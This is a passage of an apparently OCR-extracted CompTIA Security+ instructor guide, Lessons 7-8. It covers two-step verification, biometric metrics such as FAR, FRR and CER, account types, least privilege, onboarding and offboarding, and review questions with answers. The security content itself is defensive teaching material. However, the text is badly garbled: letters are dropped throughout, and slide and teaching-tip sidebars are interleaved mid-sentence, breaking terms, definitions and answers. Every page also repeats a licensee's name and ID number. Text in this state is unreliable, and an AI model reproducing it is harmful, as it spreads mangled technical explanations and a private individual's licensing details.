e pires each token after a short window seconds, for instance . or this to work,
the client device and server must be closely time synchroni ed. ne well known
implementation of T and T T is oogle Authenticator.

Two-step verification mechanism protecting web application access. The site sends a Time-based One
Time Password with a duration of five minutes to the registered cell phone by S S.

on t confuse OAT (Open Authentication) with OAuth (Open Authorization).

Lesson 7: Implementing Authentication Controls | Topic 7C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 170 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) tep erification

tep erification
-step verification or out-of-band mechanisms generate a software token on a server and
send it to a resource assumed to be safely controlled by the user. The token can be
Teaching transmitted to the device in a number of ways
Tip
• hort Message ervice M the code is sent as a te t to the registered phone
The term step number.
verification is not
used on the objectives • hone call the code is delivered as an automated voice call to the registered phone
document, but
students should
number.
understand the
di erence between • ush notification the code is sent to a registered authenticator app on the C or
these mechanisms smartphone.
and token keys.
• mail the code is sent to a registered email account.

These mechanisms are sometimes also described as -factor authentication ( A).

owever, anyone intercepting the code within the time frame could enter it
as something you know without ever possessing or looking at the device itself
auth .com blog why sms multi factor still matters .

Lesson 7: Implementing Authentication Controls | Topic 7C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 171

Review Activity:
Authentication Technologies
Answer the following uestions

1. True or alse hen implementin smart card lo on the user s pri ate e
is stored on the smart card.

True. The smart card implements a cryptoprocessor for secure generation and storage
of key and certificate material.

2. ou are pro idin consultanc to a firm to help them implement smart

card authentication to premises networks and cloud services. What are the
main ad anta es o usin an o er ser er ased e and certificate
mana ement ser ices

A hardware security module M is optimi ed for this role and so present a smaller
attack surface. It is designed to be tamper evident to mitigate against insider threat
risks. It is also likely to have a better implementation of a random number generator,
improving the security properties of key material.

3. hich net or access control rame or supports smart cards

Local logon providers, such as erberos, support smart cards, but this is not network
access control as the device has already been allowed on the network. The I .
framework means that network access servers switches, access points, and N
gateways can accept tensible Authentication rotocols A credentials, but block
any other type of network access. They act as pass thru for an authentication server,
which stores and validates the credentials. ome A types support smart card or
machine authentication.

4. hat is a A I client

A device or server that accepts user connections, often referred to as a network access
server (NAS) or as the authenticator. sing ADI architecture, the client does not need
to be able to perform authentication itself it performs pass thru to an AAA server.

5. hat is A o

A network access server that support . port based access control can enable
a port but allow only the transfer of tensible Authentication rotocol over LAN
A oL traffic. This allows the supplicant and authentication server to perform the
authentication process, with the network access server acting as a pass thru.

6. o does T protect a ainst pass ord uessin or sni n attac s

A one time password mechanism generates a token that is valid only for a short period
usually seconds , before it changes again.

Lesson 7: Implementing Authentication Controls | Topic 7C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 172 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 7D
Summarize Biometrics
Authentication Concepts

Teaching EXAM OBJECTIVES COVERED

Tip 2.4 Summarize authentication and authorization design concepts
This final part of the
authentication lesson
covers biometric iometric authentication mechanisms allow users to access an account through a
technologies. physiological feature fingerprint or iris pattern, for instance or behavioral pattern.
These are relatively
straightforward
eing able to summari e the advantages and drawbacks of biometric mechanisms will
concepts and the allow you to support the deployment and use of these technologies.
e amples are at a
summari e rather
than implement
iometric Authentication
level, so try not to The first step in setting up biometric authentication is enrollment. The chosen
spend too much time
on this topic.
biometric information is scanned by a biometric reader and converted to binary
information. There are generally two steps in the scanning process
Show Slide(s)
1. A sensor module ac uires the biometric sample from the target.

iometric 2. A feature e traction module records the features in the sample that uni uely
Authentication identify the target.
Teaching The biometric template is kept in the authentication server's database. hen the user
Tip wants to access a resource, he or she is re scanned, and the scan is compared to the
Make sure that template. If they match to within a defined degree of tolerance, access is granted.
students understand
biometrics are based everal pattern types can be used to identify people biometrically. These can be
on uni ue features, categori ed as physical fingerprint, eye, and facial recognition or behavioral voice,
not basic descriptions signature, and typing pattern matching . ey metrics and considerations used to
such as eye color. evaluate the efficacy rate of biometric pattern ac uisition and matching and suitability
as an authentication mechanism include the following
• False Rejection Rate (FRR) where a legitimate user is not recogni ed. This is also
referred to as a Type I error or false non match rate NM . is measured as a
percentage.

• False Acceptance Rate (FAR) where an interloper is accepted Type II error or

false match rate M . A is measured as a percentage.

alse re ection cause inconvenience to users, but false acceptance can lead to
security breaches, and so is usually considered the most important metric.

• Crossover Error Rate (CER) the point at which and A meet. The lower the
C , the more efficient and reliable the technology.

rrors are reduced over time by tuning the system. This is typically accomplished by
ad usting the sensitivity of the system until C is reached.

• Throughput speed the time re uired to create a template for each user and the
time re uired to authenticate. This is a ma or consideration for high traffic access
points, such as airports or railway stations.

Lesson 7: Implementing Authentication Controls | Topic 7D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 173

• ailure to nroll ate incidents in which a template cannot be created and

matched for a user during enrollment.

• Cost implementation some scanner types are more e pensive, whereas others are
not easy to incorporate on mobile devices.

• sers can find it intrusive and threatening to privacy.

• The technology can be discriminatory or inaccessible to those with disabilities.

Fingerprint Recognition Show Slide(s)

hysiologic biometric features represent a something you are factor. They include ingerprint
fingerprint patterns, iris or retina recognition, or facial recognition. ecognition
ingerprint recognition is the most widely implemented biometric authentication
method. The technology re uired for scanning and recording fingerprints is relatively
ine pensive and the process uite straightforward. A fingerprint sensor is usually
implemented as a small capacitive cell that can detect the uni ue pattern of ridges
making up the pattern. The technology is also non intrusive and relatively simple to
use, although moisture or dirt can prevent readings.

Configuring fingerprint recognition on an Android smartphone.

(Android is a trademark of Google C.)

The main problem with fin erprint scanners is that it is possible to obtain a copy of
a user's fingerprint and create a mold of it that will fool the scanner tomsguide.com
us iphone touch id hack,news .html . These concerns are addressed by vein
matching scanners, or vascular biometrics. This re uires a more comple scanner an
infrared light source and camera to create a template from the uni ue pattern of
blood vessels in a person's finger or palm.

Lesson 7: Implementing Authentication Controls | Topic 7D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 174 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Facial Recognition

acial ecognition
acial recognition records multiple indicators about the si e and shape of the face, like
the distance between each eye, or the width and length of the nose. The initial pattern
must be recorded under optimum lighting conditions depending on the technology,
this can be a lengthy process. Again, this technology is very much associated with
law enforcement, and is the most likely to make users uncomfortable about the
personal privacy issues. acial recognition su ers from relatively high false acceptance
and re ection rates and can be vulnerable to spoofing. Much of the technology
development is in surveillance, rather than for authentication, although it is becoming
a popular method for use with smartphones.
The limitations of facial recognition can be overcome by scanning more detailed
features of the eye
• etinal scan an infrared light is shone into the eye to identify the pattern of blood
vessels. The arrangement of these blood vessels is highly comple and typically
does not change from birth to death, e cept in the event of certain diseases or
in uries. etinal scanning is therefore one of the most accurate forms of biometrics.
etinal patterns are very secure, but the e uipment re uired is e pensive and the
process is relatively intrusive and comple . alse negatives can be produced by
disease, such as cataracts.

A retinal scan uses an infrared light to identify the pattern of blood vessels in the eye.
(Photo by Ghost Presenter on Unsplash.)

• Iris scan matches patterns on the surface of the eye using near infrared imaging
and so is less intrusive than retinal scanning the sub ect can continue to wear
glasses, for instance and a lot uicker. Iris scanners o er a similar level of accuracy
as retinal scanners but are much less likely to be a ected by diseases. Iris scanning
is the technology most likely to be rolled out for high volume applications, such as
airport security. There is a chance that an iris scanner could be fooled by a high
resolution photo of someone's eye.

Show Slide(s) Behavioral Technologies

ehavioral
omething you do refers to behavioral biometric pattern recognition. ather than
Technologies scan some attribute of your body, a template is created by analy ing a behavior, such
as typing, writing a signature, or walking moving. The variations in motion, pressure,
or gait are supposed to uni uely verify each individual. In practice, however, these
methods are sub ect to higher error rates, and are much more troublesome for a
sub ect to perform.

Lesson 7: Implementing Authentication Controls | Topic 7D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 175

• oice recognition relatively cheap, as the hardware and software re uired are built
into many standard Cs and mobiles. owever, obtaining an accurate template can
be difficult and time consuming. ackground noise and other environmental factors
can also interfere with logon. oice is also sub ect to impersonation.

• Gait analysis produces a template from human movement locomotion . The

technologies can either be camera based or use smartphone features, such as an
accelerometer and gyroscope.

• ignature recognition signatures are relatively easy to duplicate, but it is more

difficult to fake the actual signing process. ignature matching records the user
applying their signature stroke, speed, and pressure of the stylus .

• Typing matches the speed and pattern of a user s input of a passphrase.

ome biometric and behavioral technologies might be used for purposes other than
logon authentication
• iometric identification refers to matching people to a database, as opposed to
authenticating them per se. or e ample, if an individual crossing the oor of the data
center does not produce a match for gait analysis, the system may raise a security
alert g s.com en us media news keeping data centers secure .

• Continuous authentication verifies that the user who logged on is still operating the
device. or e ample, if a user successfully authenticates to a smartphone using a
fingerprint, the device continues to monitor key motion and pressure statistics as
the device is held and manipulated. If this deviates from the baseline, detection
system would lock the phone. This sort of technology is not available on the market
at the time of writing , but it is the sub ect of numerous research pro ects.

Lesson 7: Implementing Authentication Controls | Topic 7D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 176 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Biometrics Authentication Concepts
Answer the following uestions

1. Apart from cost, what would you consider to be the major considerations
or e aluatin a iometric reco nition technolo

rror rates false acceptance and false re ection , throughput, and whether users will
accept the technology or re ect it as too intrusive or threatening to privacy.

2. o is a fin erprint reader t picall implemented as hard are

As a capacitive cell.

3. hich t pe o e e reco nition is easier to per orm: retinal or iris scannin

Iris scans are simpler.

4. What two ways can biometric technologies be used other than for logon
authentication

or identification based on biometric features and in continuous authentication

mechanisms.

Lesson 7: Implementing Authentication Controls | Topic 7D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 177

Lesson 7
Summary
ou should be able to assess the design and use of authentication products for Teaching
on premises networks, web cloud apps, and physical security in terms of meeting Tip
confidentiality, integrity, and availability re uirements. iven a product specific setup Check that students
guide, you should be able to implement protocols and technologies such as erberos, are confident about
smart card authentication, and A ADI . ou should also be able to identify signs of the content that has
and risks from password attacks. been covered. If there
is time, revisit any
content e amples that
uidelines or Implementin Authentication Controls they have uestions
about. If you have
ollow these guidelines when you implement authentication controls used all the available
time for this lesson
• Assess the design re uirements for confidentiality, integrity, and availability given block, note the issues
the conte t for the authentication solution private network, public web, N and schedule time for
gateway, or physical site premises, for instance . a review later in the
course.
• Determine whether a multifactor authentication M A is re uired, and which
Interaction
hardware token or biometric technologies would meet the re uirement when
Opportunity
combined with a knowledge factor
ptionally, discuss
• wnership factors include smart cards, T keys fobs, or T authenticator with students what
apps installed to a trusted device. authentication
technologies are used
• iometric technologies include fingerprint, face, iris, retina, voice, and vein with in their workplaces.
efficacy determined by metric such as A , , C , speed, and accessibility. Do students have
any e perience
• step verification can provide an additional token to a trusted device or account of advantages or
disadvantages
via M , phone call, email, or push notification. of smart cards
or biometric
• aults and keys wireless fobs can provide better security for password technologies Is
authentication. there single sign on
across local networks
• elect an appropriate authentication protocol or framework and cloud services,
and if so, how is this
• erberos for sign in to local networks with support for smart card authentication. implemented

• . A ADI for authentication at a network access device, with support

for smart card authentication or secure transmission of user credentials.

• TACAC for administration of network appliances.

• Assess risks from password attacks, especially when using legacy procotols A and
C A and where hashes are e posed to capture.

Lesson 7: Implementing Authentication Controls

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 8
Implementing Identity and Account
Management Controls

LESSON INTRODUCTION Teaching

Tip
As well as ensuring that only valid users and devices connect to managed networks This lesson collects
and devices, you must ensure that these subjects are authorized with only necessary the objectives and
permissions and privileges to access and change resources. These tasks are content e amples for
complicated by the need to manage identities across on-premises networks and identity management,
cloud services. Also, account security depends on e ective organi ational policies for privilege/personnel
policies, and
personnel and security training. ou will often be involved in shaping and updating
permissions/access
these policies in line with best practice, as well as delivering security awareness control.
education and training programs.

Lesson Objectives
In this lesson, you will:
• Implement identity and account types.

• Implement account policies.

• Implement authorization solutions.

• plain the importance of personnel policies.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 180 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 8A
Implement Identity and Account Types

Teaching EXAM OBJECTIVES COVERED

Tip 3.7 Given a scenario, implement identity and account management controls
5.3 Explain the importance of policies to organizational security
This topic looks at
policies that ensure
least privilege and
Least privilege is the principle at the heart of most organi ational security policies.
govern the account
provisioning process. Identity and privilege management helps an organi ation to account for the actions of
both regular and administrative users. These systems are complicated by the presence
of default, shared, guest, and device account types that are difficult to associate with a
single identity.

Show Slide(s) Identity Management Controls

Identity Management
On a private network, a digital identity can be represented by an account. The network
Controls administrator ensures the integrity of the server hosting the accounts, while each user
is responsible for protecting the credentials so that only they can authenticate to the
Teaching account and use it. n public networks and as an e tra layer of protection on private
Tip networks, the account may also be identified by some cryptographic material.
Recap the way that
an account user or Certificates and mart Cards
computer can be
securely associated ublic key infrastructure I allows the management of digital identities, where a
with a digital ID, which certificate authority CA issues certificates to validated sub ects users and servers .
can be used for single The sub ect identity can be trusted by any third party that also trusts the CA.
sign-on to multiple
services. The certificate contains the sub ect's public key and is signed by the CA's public key.
e will return to These public keys allow third parties to verify the certificate and the signature. The
federated identity sub ect's public key is part of a pair with a linked private key. The private key must be
management in more kept secret. It can be stored on the computer, either in the file system or in a trusted
detail later in the
platform module T M chip. Alternatively, a user's certificate and private key can
lesson.
be stored on a smart card or key and used to authenticate to di erent Cs and
mobile devices.

Tokens
It is inconvenient for users to authenticate to each application they need to use. In a
single sign on system, the user authenticates to an identity provider Id and receives
a cryptographic token. The user can present that token to compatible applications as
proof they are authenticated, and receive authori ations from the application. ith a
token, there is always a risk that a malicious actor will be able to capture and replay it.
The application protocol that makes use of tokens must be designed to resist this type
of attack.

Identity Providers
The identity provider is the service that provisions the user account and processes
authentication requests. On a private network, these identity directories and
application authorization services can be operated locally. The same site operates both

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 181

identity provision and application provision. Most networks now make use of third
party cloud services, however. In this scenario, various protocols and frameworks are
available to implement federated identity management across web based services.
This means that a user can create a digital identity with a one provider, but other sites
can use that identity to authori e use of an application.

ac round Chec and n oardin olicies Show Slide(s)

Identity and access management IAM involves both IT security procedures and ackground Check
technologies and uman esources policies. ersonnel management policies are and Onboarding
applied in three phases: olicies
• ecruitment hiring locating and selecting people to work in particular ob roles. Teaching
ecurity issues here include screening candidates and performing background Tip
checks.
Explain how account
and privilege policies
• peration working it is often the department that manages the
apply to job roles,
communication of policy and training to employees though there may be facilitated at least
a separate training and personal development department within larger partly by HR. These
organi ations . As such, it is critical that managers devise training programs that written policies are
communicate the importance of security to employees. then expressed
as technical
• Termination or separation firing or retiring whether an employee leaves controls, such as
voluntarily or involuntarily, termination is a difficult process, with numerous security network accounts
and permissions
implications.
assignments.

Background Check
A background check determines that a person is who they say they are and are
not concealing criminal activity, bankruptcy, or connections that would make them
unsuitable or risky. mployees working in high confidentiality environments or with
access to high value transactions will obviously need to be subjected to a greater
degree of scrutiny. or some obs, especially federal obs re uiring a security clearance,
background checks are mandatory. ome background checks are performed internally,
whereas others are done by an e ternal third party.

Onboarding
Onboarding at the level is the process of welcoming a new employee to the
organi ation. The same sort of principle applies to taking on new suppliers or
contractors. ome of the same checks and processes are used in creating customer
and guest accounts. As part of onboarding, the IT and function will combine to
create an account for the user to access the computer system, assign the appropriate
privileges, and ensure the account credentials are known only to the valid user. These
functions must be integrated, to avoid creating accidental configuration vulnerabilities,
such as IT creating an account for an employee who is never actually hired. ome of
the other tasks and processes involved in onboarding include:
• Secure transmission of credentials creating and sending an initial password
or issuing a smart card securely. The process needs protection against rogue
administrative sta . Newly created accounts with simple or default passwords are
an easily exploitable backdoor.

• Asset allocation provision computers or mobile devices for the user or agree to
the use of bring your own device handsets.

• Training/policies schedule appropriate security awareness and role relevant

training and certification.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 182 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Non-Disclosure Agreement (NDA)

The terms of an non-disclosure agreement (NDA) might be incorporated within the
employee contract or could be a separate document. hen an employee or contractor
signs an NDA, they are asserting that they will not share confidential information with a
third party.

Show Slide(s) Personnel Policies for Privilege Management

ersonnel olicies for
and IT must collaborate to ensure e ective privilege management. These policies
rivilege Management aim to ensure that the risk of insider threat is minimi ed.

Teaching eparation o uties

Tip
Separation of duties is a means of establishing checks and balances against the
Make sure students
understand what each
possibility that critical systems or procedures can be compromised by insider threats.
policy entails and how Duties and responsibilities should be divided among individuals to prevent ethical
they reduce risks from con icts or abuse of powers.
insider threat and
account compromise. An employee is supposed to work for the interests of their organization exclusively. A
situation where someone can act in his or her own interest, personally, or in the interests of
a third party is said to be a con ict of interest.

eparation of duties means that employees must be constrained by security policies

• tandard operating procedures s mean that an employee has no e cuse for
not following protocol in terms of performing these types of critical operations.

• Shared authority means that no one user is able to action or enable changes on his
or her own authority. At least two people must authorize the change. One example
is separating responsibility for purchasing ordering from that of authori ing
payment. Another is that a request to create an account should be subject to
approval and oversight.

Separation of duties does not completely eliminate risk because there is still the chance of
collusion between two or more people. This, however, is a much less likely occurrence than
a single rogue employee.

Least Privilege
Least privilege means that a user is granted sufficient rights to perform his or her ob
and no more. This mitigates risk if the account should be compromised and fall under
the control of a threat actor. Authori ation creep refers to a situation where a user
acquires more and more rights, either directly or by being added to security groups
and roles. Least privilege should be ensured by closely analy ing business work ows to
assess what privileges are re uired and by performing regular account audits.

Job Rotation
Job rotation or rotation of duties means that no one person is permitted to remain
in the same ob for an e tended period. or e ample, managers may be moved to
di erent departments periodically, or employees may perform more than one ob role,
switching between them throughout the year. otating individuals into and out of roles,
such as the firewall administrator or access control specialist, helps an organi ation
ensure that it is not tied too firmly to any one individual because vital institutional
knowledge is spread among trusted employees. Job rotation also helps prevent abuse
of power, reduces boredom, and enhances individuals' professional skills.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 183

Mandatory Vacation
Mandatory vacation means that employees are forced to take their vacation time,
during which someone else fulfills their duties. The typical mandatory vacation policy
re uires that employees take at least one vacation a year in a full week increment
so that they are away from work for at least five days in a row. During that time, the
corporate audit and security employees have time to investigate and discover any
discrepancies in employee activity.

oardin olicies Show Slide(s)

An e it interview or o oardin is the process of ensuring that an employee leaves a boarding olicies
company gracefully. boarding is also used when a pro ect using contractors or third
parties ends. In terms of security, there are several processes that must be completed Interaction
Opportunity
• Account management disable the user account and privileges. nsure that
any information assets created or managed by the employee but owned by the Ask students if they
have experienced
company are accessible in terms of encryption keys or password protected files .
situations where
ex-employees have
• Company assets retrieve mobile devices, keys, smart cards, media, and so
caused security
on. The employee will need to confirm and in some cases prove that they have not issues. The Capital
retained copies of any information assets. One breach is a
classic case study
• ersonal assets wipe employee owned devices of corporate data and applications. krebsonsecurity.
The employee may also be allowed to retain some information assets such as com/tag/capital-one-
personal emails or contact information , depending on the policies in force. breach .

The departure of some types of employees should trigger additional processes to

re secure network systems. amples include employees with detailed knowledge of
security systems and procedures, and access to shared or generic account credentials.
These credentials must be changed immediately.

Security Account Types and Credential Management Show Slide(s)

Operating systems, network appliances, and network directory products use some Security Account
standard account types as the basis of a privilege management system. These include Types and Credential
standard user, administrative user, security group accounts, and service accounts. Management
Standard users have limited privileges, typically with access to run programs and to Teaching
create and modify files belonging only to their profile. Tip
This content is
Credential Management Policies for Personnel merging the account
types content
Improper credential management continues to be one of the most fruitful vectors e amples from
for network attacks. If an organi ation must continue to rely on password based objective 3.7 with the
credentials, its usage needs to be governed by strong policies and training. credential policies
content examples
A password policy instructs users on best practice in choosing and maintaining from ob ective . .
passwords. More generally, a credential management policy should instruct users on This topic is focused
how to keep their authentication method secure, whether this be a password, smart on management/
card, or biometric ID. assword protection policies mitigate against the risk of attackers operational controls.
being able to compromise an account and use it to launch other attacks on the e will cover technical
network. The credential management policy also needs to alert users to diverse types account policy controls
in the next topic.
of social engineering attacks. sers need to be able to spot phishing and pharming
attempts, so that they do not enter credentials into an unsecure form or spoofed site.

Guest Accounts
A guest account is a special type of shared account with no password. It allows
anonymous and unauthenticated access to a resource. The indows creates guest

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 184 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

user and group accounts when installed, but the guest user account is disabled by
default. uest accounts are also created when installing web services, as most web
servers allow unauthenticated access.

Show Slide(s) ecurit roup ased ri ile es

ecurity roup ased
As well as an account to use resources on the local computer, users also typically
rivileges need accounts to use resources on the network. In fact, most accounts are created
on a network directory and then given permission to log in on certain computer or
Teaching workstation objects.
Tip
One approach to network privilege management is to assign privileges directly to
Make sure students
understand the
user accounts. This model is only practical if the number of users is small. ith large
reasons for using number of users, it is difficult to audit and to apply privilege policies consistently.
security groups.
The concept of a security group account simplifies and centrali es the administrative
process of assigning rights. ather than assigning rights directly, the system owner
assigns them to security group accounts. User accounts gain rights by being made
a member of a security group. A user can be a member of multiple groups and can
therefore receive rights and permissions from several sources.

Show Slide(s)

Administrator/Root
Accounts

Teaching
Tip
Make sure students
understand the
di erence between
privileged accounts
and generic default
administrator/root/
superuser accounts.
Also note that these Using security groups to assign privileges. (Images 1 .com.)
accounts obtain
rights from default
security groups. or
e ample, in indows Administrator/Root Accounts
the "Administrator"
account is disabled Administrative or privileged accounts are able to install and remove apps and device
by default, but the drivers, change system level settings, and access any ob ect in the file system. Ideally,
account created only accounts that have been created and assigned specific permissions should have
during installation is this kind of elevated privilege. In practice, it is very hard to eliminate the presence
automatically added to
the "Administrators"
of default administrator accounts. A default account is one that is created by the
security group, and so operating system or application when it is installed. The default account has every
has exactly the same permission available. In indows, this account is called Administrator in Linu , it is
permissions. called root. This type of account is also referred to as a superuser.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 185

Generic Administrator Account Management

uperuser accounts directly contradict the principles of least privilege and separation
of duties. Conse uently, superuser accounts should be prohibited from logging on
in normal circumstances. The default superuser account should be restricted to
disaster recovery operations only. In indows, the account is usually disabled by
default and can be further restricted using group policy docs.microsoft.com en us
windows-server/identity/ad-ds/plan/security-best-practices/appendix-h--securing-local-
administrator-accounts-and-groups . The first user account created during setup has
superuser permissions, however.

On Windows networks, you also need to distinguish between local administrators and
domain administrators. The scope of a local administrator's privileges is restricted to the
machine hosting the account. Domain administrators can have privileges over any machine
joined to the domain.

buntu Linu follows a similar approach the root account is configured with no
password and locked, preventing login. An alternate superuser account is created
during setup. In other Linux distributions, a password is usually set at install time. This
password must be kept as securely as is possible.

Administrator Credential olicies

The default superuser should be replaced with one or more named accounts with
sufficient elevated privileges for a given ob role. This can be referred to as generic
account prohibition. It means that administrative activity can be audited and the
system as a whole conforms to the property of non repudiation.

It is a good idea to restrict the number of administrative accounts as much as possible. The
more accounts there are, the more likely it is that one of them will be compromised. On
the other hand, you do not want administrators to share accounts, as that compromises
accountability.

Users with administrative privileges must take the greatest care with credential
management. Privilege-access accounts must use strong passwords and ideally
multifactor authentication M A .

Default Security Groups

Most operating systems also create default security groups, with a default set of
permissions. In indows, privileges are assigned to local group accounts the sers
and Administrators groups rather than directly to user accounts. Custom security
groups with di erent permissions can be created to enforce the principle of least
privilege. In Linu , privileged accounts are typically configured by adding either a user
or a group account to the /etc/sudoers file linu .com training tutorials start fine
tuning-sudo-linux .

Service Accounts Show Slide(s)

Service accounts are used by scheduled processes and application server software, such Service Accounts
as databases. indows has several default service account types. These do not accept
user interactive logons but can be used to run processes and background services:
• ystem has the most privileges of any indows account. The local system account
creates the host processes that start indows before the user logs on. Any process
created using the system account will have full privileges over the local computer.

• Local ervice has the same privileges as the standard user account. It can only
access network resources as an anonymous user.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 186 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• Network ervice has the same privileges as the standard user account but can
present the computer's account credentials when accessing network resources.

Configuring the credentials for a service running on indows Server. This service is using the local
system account. This account has full local administrator privileges.
(Screenshot used with permission from icrosoft.)

Linu also uses the concept of service accounts to run non interactive daemon
processes, such as web servers and databases. These accounts are usually created by
the server application package manager. sers can be prevented from logging into
these accounts often by setting the password to an unknown value and denying shell
access .
If a named account is manually configured to run a service, the password for the
service account will e ectively be shared by multiple administrators. Many operating
systems support automatic provisioning of credentials for service accounts, reducing
the risk of insider threat techcommunity.microsoft.com t ask the directory services
team/managed-service-accounts-understanding-implementing-best/ba-p/397009 .

Be aware of the risk of using a personal account when a service account is appropriate. If
you use a personal account and the user changes the password or the account is disabled
for some reason, then the service will fail to run, which can cause serious problems with
business applications.

Show Slide(s) Shared/Generic/Device Accounts and Credentials

hared eneric
A shared account is one where passwords or other authentication credentials are
Device Accounts and known to more than one person. Typically, simple SOHO networking devices do not
Credentials allow for the creation of multiple accounts and a single Admin account is used to
manage the device. These accounts might be configured with a default password.
ther e amples include the default or generic accounts, such as Administrator
and uest in indows or root in Linu , or accounts added to default security groups.
hared accounts may also be set up for temporary sta .
A shared account breaks the principle of non repudiation and makes an accurate audit
trail difficult to establish. It makes it more likely that the password for the account will
be compromised. The other major risk involves password changes to an account. Since
fre uent password changing is a common policy, organi ations will need to ensure that
everyone who has access to an account knows when the password will change, and
what that new password will be. This necessitates distributing passwords to a large
group of people, which itself poses a significant challenge to security. hared accounts
should only be used where these risks are understood and accepted.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 187

Credential Policies for Devices

Network appliances designed for enterprise use are unlikely to be restricted to a
single default account, and will use TACAC to support individual accounts and role
based permissions. If a device can only be operated with a shared password, ensure
separation of duties to ensure the device remains in an authori ed configuration.

Privilege Access Management

ven with the most carefully designed role based permissions, it is almost impossible
to eliminate use of shared device root passwords completely. nterprise privilege
access management products provide a solution for storing these high risk
credentials somewhere other than a spreadsheet and for auditing elevated privileges
generally gartner.com/reviews/market/privileged-access-management .

Secure Shell Keys and Third-Party Credentials Show Slide(s)

ecure hell is a widely used remote access protocol. It is very likely to be used to ecure hell eys
manage devices and services. uses two types of key pairs and Third-Party
Credentials
• A host key pair identifies an server. The server reveals the public part when a
client connects to it. The client must use some means of determining the validity of
this public key. If accepted, the key pair is used to encrypt the network connection
and start a session.

• A user key pair is a means for a client to login to an server. The server stores a
copy of the client's public key. The client uses the linked private key to generate an
authentication re uest and sends the re uest not the private key to the server.
The server can only validate this re uest if the correct public key is held for that
client.

keys have often not been managed very well, leading to numerous security
breaches, most infamously the ony hack ssh.com/malware . There are vendor
solutions for key management or you can configure servers and clients to use
public key infrastructure I and certificate authorities CAs to validate identities.
A third-party credential is one used by your company to manage a vendor service or
cloud app. As well as administrative logons, devices and services may be configured
with a password or cryptographic keys to access hosts via SSH or via an application
programming interface (API). Improper management of these secrets, such as
including them in code or scripts as plainte t, has been the cause of many breaches
nakedsecurity.sophos.com thousands of coders are leaving their crown
jewels-exposed-on-github .

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 188 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Security credentials for an account on Amazon eb Services (A S). The user can authenticate with a
password credential, or use an access key within a script. The access key is stored only on the user's
client device and cannot be retrieved via the console. It can be disabled or deleted, however.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 189

Review Activity:
Identity and Account Types
Answer the following uestions

1. You are consulting with a company about a new approach to authenticating

users. You suggest there could be cost savings and better support for
multifactor authentication (MFA) if your employees create accounts with a
cloud pro ider That allo s the compan s sta to ocus on authori ations
and privilege management. What type of service is the cloud vendor
performing?

The cloud vendor is acting as the identity provider.

2. What is the process of ensuring accounts are only created for valid users,
only assigned the appropriate privileges, and that the account credentials
are known only to the valid user?

Onboarding.

3. What is the policy that states users should be allocated the minimum
su cient permissions

Least privilege.

4. What is a SOP?

A standard operating procedure is a step by step listing of the actions that must
be completed for any given task.

5. hat t pe o or ani ational policies ensure that at least t o people ha e

oversight of a critical business process?

hared authority, ob rotation, and mandatory enforced vacation holidays.

6. Recently, attackers were able to compromise the account of a user whose

employment had been terminated a week earlier. They used this account
to access a net or share and delete important files hat account
vulnerability enabled this attack?

hile it's possible that la password re uirements and incorrect privileges may
have contributed to the account compromise, the most glaring problem is that the
terminated employee's account wasn't disabled. ince the account was no longer being
used, it should not have been left active for a malicious user to e ploit.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

